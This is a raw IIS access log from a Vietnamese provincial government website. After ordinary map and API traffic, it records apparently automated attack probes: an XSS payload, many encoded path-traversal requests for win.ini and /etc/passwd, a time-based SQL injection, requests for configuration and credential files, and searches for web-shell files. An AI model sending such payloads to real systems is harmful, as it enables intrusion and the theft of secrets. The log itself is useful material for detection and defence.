Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 39 2023-06-27 07:41:05 103.153.214.94 GET /esri/images/basemap/hybrid.jpg - 443 - 123.16.148.14 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 50 2023-06-27 07:41:05 103.153.214.94 GET /esri/images/basemap/osm.jpg - 443 - 123.16.148.14 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 70 2023-06-27 07:41:05 103.153.214.94 GET /77caabd3-1877-4634-85c8-8e398a093b99.woff2 - 443 - 123.16.148.14 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 44 2023-06-27 07:41:05 103.153.214.94 GET /e78b17bb-11fb-4860-8d66-4ee0d0c1e117.woff2 - 443 - 123.16.148.14 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 69 2023-06-27 07:41:05 103.153.214.94 GET /77caabd3-1877-4634-85c8-8e398a093b99-ext.woff2 - 443 - 123.16.148.14 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 69 2023-06-27 07:41:05 103.153.214.94 GET /e78b17bb-11fb-4860-8d66-4ee0d0c1e117-ext.woff2 - 443 - 123.16.148.14 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 69 2023-06-27 07:41:05 103.153.214.94 GET /152-es2015.js - 443 - 123.16.148.14 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 27 2023-06-27 07:41:05 103.153.214.94 GET /65-es2015.js - 443 - 123.16.148.14 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 31 2023-06-27 07:41:07 103.153.214.94 GET /tram-bts-tram-bts-module-ngfactory-es2015.js - 443 - 123.16.148.14 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 76 2023-06-27 07:41:07 103.153.214.94 GET /api/odata/DonVis $expand=SYS_VaiTroLoaiDonVi&$filter=SYS_VaiTroLoaiDonVi/Ma%20eq%20%27DN%27&$select=ID,MaDonVi,TenDonVi 443 - 123.16.148.14 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/bts-stations/list 200 0 0 52 2023-06-27 07:41:14 103.153.214.94 GET /tuyen-cap-noi-tuyen-cap-noi-module-ngfactory-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/bts-stations/list 200 0 0 30 2023-06-27 07:41:14 103.153.214.94 GET /api/odata/DonVis $expand=SYS_VaiTroLoaiDonVi&$filter=SYS_VaiTroLoaiDonVi/Ma%20eq%20%27DN%27&$select=ID,MaDonVi,TenDonVi 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/floating-cable-glands/list 200 0 0 63 2023-06-27 07:41:16 103.153.214.94 GET /tuyen-cap-ngam-tuyen-cap-ngam-module-ngfactory-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/floating-cable-glands/list 200 0 0 28 2023-06-27 07:41:16 103.153.214.94 GET /api/odata/DonVis $expand=SYS_VaiTroLoaiDonVi&$filter=SYS_VaiTroLoaiDonVi/Ma%20eq%20%27DN%27&$select=ID,MaDonVi,TenDonVi 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/underground-cable-glands/list 200 0 0 131 2023-06-27 07:46:57 103.153.214.94 GET / - 443 - 15.235.162.47 facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php)+_zbot - 200 0 0 77 2023-06-27 07:47:07 103.153.214.94 GET / - 443 - 15.235.162.47 facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php)+_zbot - 200 0 0 68 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 08:09:40 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 08:09:39 103.153.214.94 GET /wp-content/plugins/sniplets/view/sniplets/warning.php text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 721 2023-06-27 08:12:25 103.153.214.94 POST /cgi-bin/readycloud_control.cgi 1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 35 2023-06-27 08:20:12 103.153.214.94 GET /Catalog/BlobHandler.ashx Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 76 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 08:46:36 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 08:46:35 103.153.214.94 GET / - 443 - 157.245.207.25 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:61.0)+Gecko/20100101+Firefox/68.0 - 200 0 0 547 2023-06-27 08:47:01 103.153.214.94 GET /favicon.ico - 443 - 157.245.207.25 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/76.0.3809.100+Safari/537.36 - 200 0 0 24643 2023-06-27 08:49:05 103.153.214.94 GET /webadmin/ - 443 - 84.46.251.165 Mozilla/5.0+(X11;+U;+Linux+i686;+en-US)+AppleWebKit/532.4+(KHTML,+like+Gecko)+Chrome/4.0.237.0+Safari/532.4+Debian - 200 0 0 243 2023-06-27 08:56:59 103.153.214.94 GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 34 2023-06-27 08:57:07 103.153.214.94 GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 11 0 30 2023-06-27 08:57:11 103.153.214.94 GET / - 443 - 157.245.207.25 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:91.0)+Gecko/20100101+Firefox/91.0 - 200 0 0 34 2023-06-27 08:57:11 103.153.214.94 GET /windows/win.ini - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 43 2023-06-27 08:57:13 103.153.214.94 GET / - 443 - 157.245.207.25 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/97.0.4692.71+Safari/537.36 http://bcvt.kontum.gov.vn 200 0 0 28 2023-06-27 08:57:15 103.153.214.94 GET /................windows/win.ini - 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 29 2023-06-27 08:57:19 103.153.214.94 GET /favicon.ico - 443 - 157.245.207.25 Go-http-client/1.1 - 200 0 995 7919 2023-06-27 08:57:23 103.153.214.94 GET /À®À®/À®À®/À®À®/À®À®/À®À®/À®À®/À®À®/À®À®/windows/win.ini - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 30 2023-06-27 08:57:27 103.153.214.94 GET / redirect=..%2f..%2f..%2f..%2fwindows/win.ini 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 37 2023-06-27 08:57:31 103.153.214.94 GET / page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 32 2023-06-27 08:57:33 103.153.214.94 GET / url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 26 2023-06-27 08:57:43 103.153.214.94 GET /À®À®/À®À®/À®À®/windows/win.ini - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 54 2023-06-27 08:57:51 103.153.214.94 GET /index.php page=windows/win.ini 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 28 2023-06-27 08:57:55 103.153.214.94 GET /index.php page=windows/win.ini%00 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 24 2023-06-27 08:57:57 103.153.214.94 GET /index.php page=../../windows/win.ini 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 25 2023-06-27 08:58:01 103.153.214.94 GET /index.php page=....//....//windows/win.ini 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 29 2023-06-27 08:58:07 103.153.214.94 GET /.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 11 0 26 2023-06-27 08:58:13 103.153.214.94 GET /%5c%5c..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/windows/win.ini - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 11 0 30 2023-06-27 09:01:45 103.153.214.94 GET /cgit/cgit.cgi/git/objects/ path=../../../../../../../etc/passwd 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 43 2023-06-27 09:08:57 103.153.214.94 GET / - 443 - 157.245.207.25 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/97.0.4692.71+Safari/537.36 http://bcvt.kontum.gov.vn 200 0 0 63 2023-06-27 09:08:58 103.153.214.94 GET / - 443 - 157.245.207.25 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.1+Safari/605.1.15 - 200 0 0 36 2023-06-27 09:09:05 103.153.214.94 GET /favicon.ico - 443 - 157.245.207.25 Go-http-client/1.1 - 200 0 995 7076 2023-06-27 09:13:30 103.153.214.94 GET / - 443 - 157.245.207.25 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/76.0.3809.100+Safari/537.36 - 200 0 0 64 2023-06-27 09:13:37 103.153.214.94 GET /favicon.ico - 443 - 157.245.207.25 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/76.0.3809.100+Safari/537.36 - 200 0 0 7855 2023-06-27 09:18:36 103.153.214.94 POST /webapi/auth - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 38 2023-06-27 09:18:36 103.153.214.94 GET /webapi/file/transfer name=/../../../../../../../../etc/passwd&type=db_backup 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 24 2023-06-27 09:25:43 103.153.214.94 POST /apply.cgi - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 30 2023-06-27 09:29:51 103.153.214.94 GET /him/api/rest/V1.0/system/log/list filePath=../ 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 35 2023-06-27 09:29:53 103.153.214.94 GET /weaver/ln.FileDownload fpath=../ecology/WEB-INF/web.xml 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 33 2023-06-27 09:42:39 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_jwhmcs 443 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 88 2023-06-27 09:44:52 103.153.214.94 GET /robots.txt - 443 - 216.244.66.227 Mozilla/5.0+(compatible;+DotBot/1.2;++https://opensiteexplorer.org/dotbot;+help@moz.com) - 200 0 0 561 2023-06-27 09:45:33 103.153.214.94 GET /;/WEB-INF/web.xml - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 55 2023-06-27 09:45:39 103.153.214.94 GET /resin-doc/;/WEB-INF/resin-web.xml - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 43 2023-06-27 09:48:57 103.153.214.94 GET /avatar/1?d=http:%2F%2Fimgur.com%2F..%252F1.1.1.1 - 443 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 11 0 23 2023-06-27 09:54:37 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_addressbook 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 31 2023-06-27 09:54:38 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_mtfireeagle 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 26 2023-06-27 09:56:35 103.153.214.94 GET /solr/admin/cores wt=json 443 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 40 2023-06-27 09:58:25 103.153.214.94 GET / - 443 - 216.244.66.227 Mozilla/5.0+(compatible;+DotBot/1.2;++https://opensiteexplorer.org/dotbot;+help@moz.com) - 200 0 0 203 2023-06-27 09:58:53 103.153.214.94 GET / - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 28 2023-06-27 10:01:45 103.153.214.94 GET /webadmin.php - 443 - 84.46.251.165 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/100.0.4896.88+Safari/537.36 - 200 0 0 231 2023-06-27 10:09:01 103.153.214.94 GET /php/connector.minimal.php cmd=file&download=1&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 31 2023-06-27 10:14:31 103.153.214.94 GET /assets/file:/etc/passwd - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 34 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 10:32:36 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 10:32:35 103.153.214.94 GET / - 443 - 157.245.207.25 Mozilla/5.0+(Windows+NT+10.0;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 200 0 0 861 2023-06-27 10:36:37 103.153.214.94 GET /wp-content/plugins/tutor/views/pages/instructors.php sub_page=/etc/passwd 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 48 2023-06-27 10:37:25 103.153.214.94 POST /index.php - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 28 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 11:11:09 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 11:11:09 103.153.214.94 GET /api/v1/components 1%5B0%5D&1%5B1%5D=a&1%5B2%5D&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--&name=1 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 2 2708 2023-06-27 11:11:28 103.153.214.94 GET /.msmtprc - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 170 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 11:37:47 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 11:37:47 103.153.214.94 GET /var/resource_config.json - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 549 2023-06-27 11:48:17 103.153.214.94 GET /_users/_all_docs - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 33 2023-06-27 11:56:01 103.153.214.94 GET /index.php controller=../../../../../../../../etc/passwd&id=1&option=com_biblestudy&view=studieslist 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 37 2023-06-27 12:01:57 103.153.214.94 POST /ZMC_Admin_Login - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 44 2023-06-27 12:08:43 103.153.214.94 GET /cgi-bin/wapopen B1=OK&FILECAMERA=../../etc/passwd%00&NAME=admin&NO=CAM_16&ONLOAD_HTML=onload.htm&PIC_SIZE=0&PWD=admin&REFRESH_HTML=auto.htm&REFRESH_TIME=Auto_00&STREAMING_HTML=streaming.htm 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 48 2023-06-27 12:17:37 103.153.214.94 POST /minio/bootstrap/v1/verify - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 36 2023-06-27 12:22:34 103.153.214.94 GET /wso112233.php - 443 - 139.99.77.68 Mozlila/5.0+(Linux;+Android+7.0;+SM-G892A+Bulid/NRD90M;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/60.0.3112.107+Moblie+Safari/537.36 www.google.com 200 0 0 78 2023-06-27 12:23:19 103.153.214.94 GET /bala.php - 443 - 139.99.77.68 Mozlila/5.0+(Linux;+Android+7.0;+SM-G892A+Bulid/NRD90M;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/60.0.3112.107+Moblie+Safari/537.36 www.google.com 200 0 0 75 2023-06-27 12:25:33 103.153.214.94 GET /rindex.php action=add&action=add 443 - 139.99.77.68 Mozlila/5.0+(Linux;+Android+7.0;+SM-G892A+Bulid/NRD90M;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/60.0.3112.107+Moblie+Safari/537.36 www.google.com 200 0 0 77 2023-06-27 12:25:52 103.153.214.94 GET /wp-includes/sodium_compat/src/Core/Curve25519/Ge/wp_blog.php - 443 - 139.99.77.68 Mozlila/5.0+(Linux;+Android+7.0;+SM-G892A+Bulid/NRD90M;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/60.0.3112.107+Moblie+Safari/537.36 www.google.com 200 0 0 77 2023-06-27 12:25:57 103.153.214.94 GET /wp-admin/xl2023.php - 443 - 139.99.77.68 Mozlila/5.0+(Linux;+Android+7.0;+SM-G892A+Bulid/NRD90M;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/60.0.3112.107+Moblie+Safari/537.36 www.google.com 200 0 0 73 2023-06-27 12:26:51 103.153.214.94 GET /.seo.php - 443 - 139.99.77.68 Mozlila/5.0+(Linux;+Android+7.0;+SM-G892A+Bulid/NRD90M;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/60.0.3112.107+Moblie+Safari/537.36 www.google.com 200 0 0 73 2023-06-27 12:27:11 103.153.214.94 GET /xl2023.php - 443 - 139.99.77.68 Mozlila/5.0+(Linux;+Android+7.0;+SM-G892A+Bulid/NRD90M;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/60.0.3112.107+Moblie+Safari/537.36 www.google.com 200 0 0 76 2023-06-27 12:27:51 103.153.214.94 GET /xl2023x.php - 443 - 139.99.77.68 Mozlila/5.0+(Linux;+Android+7.0;+SM-G892A+Bulid/NRD90M;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/60.0.3112.107+Moblie+Safari/537.36 www.google.com 200 0 0 49 2023-06-27 12:32:37 103.153.214.94 GET /sites/all/modules/avatar_uploader/lib/demo/view.php file=../../../../../../../../../../../etc/passwd 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 47 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 12:49:21 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 12:49:21 103.153.214.94 GET / patreon_action=serve_patron_only_image&patron_only_image=../../../../../../../../../../etc/passwd 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 35 2023-06-27 12:49:45 103.153.214.94 GET /WEB-INF/web.xml - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 32 2023-06-27 12:49:55 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 38 2023-06-27 12:49:55 103.153.214.94 GET /wp-content/uploads/p3d/2ReXavjTZOY2aI766gUUAymkKtE.php - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 27 2023-06-27 12:59:25 103.153.214.94 GET /appsettings.json - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 30 2023-06-27 12:59:25 103.153.214.94 GET /appsettings.Production.json - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 27 2023-06-27 13:00:10 103.153.214.94 GET /index.php 